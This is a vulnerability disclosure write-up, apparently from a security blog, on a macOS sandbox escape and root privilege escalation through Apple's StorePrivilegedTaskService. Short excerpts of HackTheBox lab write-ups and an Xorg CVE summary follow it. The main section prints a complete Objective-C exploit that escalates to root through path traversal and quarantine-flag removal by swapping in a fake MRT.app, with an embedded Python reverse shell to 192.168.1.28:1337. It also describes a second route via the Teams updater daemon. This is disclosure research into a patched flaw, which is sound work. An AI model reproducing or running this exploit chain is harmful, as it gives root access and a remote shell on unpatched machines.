  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restriction related to files and folders are:

(allow file-read* file-write*
    (require-all
        (vnode-type DIRECTORY)
        (require-any
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
    (require-all
        (vnode-type REGULAR-FILE)
        (require-any
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/com.apple.commerce.plist")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/com.apple.appstored")
    (subpath "/System/Library/Caches/OnDemandResources")
)

The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $) is a mistake for the file regexes.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.

By creating a specific directory structure in the temporary files directory of our sandboxed application:

bar.appdownload/Icon/

Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.

Privesc

This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:

/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
	<key>MachServices</key>
	<dict>
		<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
		<true/>
	</dict>
	<key>Program</key>
	<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.1
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];

assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];

assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];

assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];

Fix

Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:

  1. Check the entitlements of the process initiating the connection to StorePrivilegedTaskService.
  2. Tightened the sandboxing profile of StorePrivilegedTaskService.
  3. The path traversal vulnerabilities for the subdirectory check were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.


  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

Xorg LPE CVE 2018-14665

On October 25th 2018 a post was made on SecurityTracker disclosing CVE 2018-14665. The interesting thing is this CVE has two bugs in two different arguments. The first is a flaw in the -modulepath argument which could lead to arbitrary code execution. The second was a flaw in the -logfile argument which could allow arbitrary files to be deleted from the system. Both of these issues were caused by poor command line validation.

HackTheBox - Legacy Writeup

Introduction This is a writeup for the machine “Legacy” (10.10.10.4) on the platform HackTheBox. HackTheBox is a pentetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/legacy.xml 10.10.10.4 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

HackTheBox - Lame Writeup

Introduction This is a writeup for the machine “Lame” (10.10.10.3) on the platform HackTheBox. HackTheBox is a pentetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/lame.xml 10.10.10.3 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

HackTheBox - Devel Writeup

Introduction This is a writeup for the machine “Devel” (10.10.10.5) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As usual we’re going to start off with our two nmap scans, a full TCP scan using nmap -sV -sC -p- 10.10.10.5 and nmap -sU -p- 10.10.10.5 in this case, we only returned ports open on TCP so we’re going to look at that now.

HackTheBox - Cronos Writeup

Introduction This is a writeup for the machine “Cronos” (10.10.10.13) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP Let’s start off with our two nmap scans, a full TCP & a full UDP. In this case only our TCP scan returned any results so we’re only going to analyse the output of the TCP scan.

HackTheBox - Bashed Writeup

Introduction This is a writeup for the machine “Bashed” (10.10.10.68) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We start off with our two nmap scans, TCP & UDP however, in this boxes case we only got information returned on TCP so we will only analyse the output for the TCP scan in this post.

HackTheBox - Beep Writeup

Introduction This is a writeup for the machine “Beep” (10.10.10.7) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As always we start off with our full TCP port scan using NMAP - this box is running quite a lot of services but don’t let that scare you! We follow the same enumeration process so let’s not worry that its any different just because there are more ports!
❌
❌